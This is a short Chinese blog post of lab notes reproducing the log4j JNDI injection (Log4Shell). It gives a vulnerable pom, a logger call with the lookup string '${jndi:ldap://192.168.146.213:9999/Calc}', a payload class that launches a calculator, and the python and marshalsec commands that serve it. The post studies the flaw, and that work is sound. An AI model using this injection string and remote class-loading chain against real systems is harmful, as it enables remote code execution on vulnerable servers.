This_is_Y
log4j反序列化分析笔记
This_is_Y Lv6
  2023-12-08 12:00:00   2024-03-22 21:25:57  421 字  2 分钟  

环境搭建

idea直接新建一个项目

  • ubuntu 22.04
  • java version “1.8.0_102”
  • marshalsec-0.0.3-SNAPSHOT-all.jar (sha1 22f311752a1c6ce1102bcb199458c8d10118ae6e)
  • python3x

pom.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.11.2</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.11.2</version>
        </dependency>
    </dependencies>

</project>

main.java

1
2
3
4
5
6
7
8
9
10
11
12
13
package org.example;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.core.Logger;

public class Main {
    private static final Logger logger = (Logger)  LogManager.getLogger(Main.class);
    public static void main(String[] args) {

        System.out.println("Hello world!");
        logger.error("${jndi:ldap://192.168.146.213:9999/Calc}");
    }
}

Calc.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// javac Calc.java
import java.lang.Runtime;
import java.lang.Process;

public class Calc {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"gnome-calculator"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译Calc.java为Calc.class,然后本地使用python起一个web服务(sudo python3 -m http.server 8888),之后使用marshalsec起一个jndi服务(java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://0.0.0.0:8888/#Calc" 9999)

运行结果:

image-20240322212143201

参考:

https://blog.51cto.com/u_16117621/6292981

 评论
评论插件加载失败
正在加载评论插件
  1. 环境搭建
© 2021 - 2024    This_is_Y
由 Hexo 驱动 & 主题 Keep
访客数 访问量
  1. 环境搭建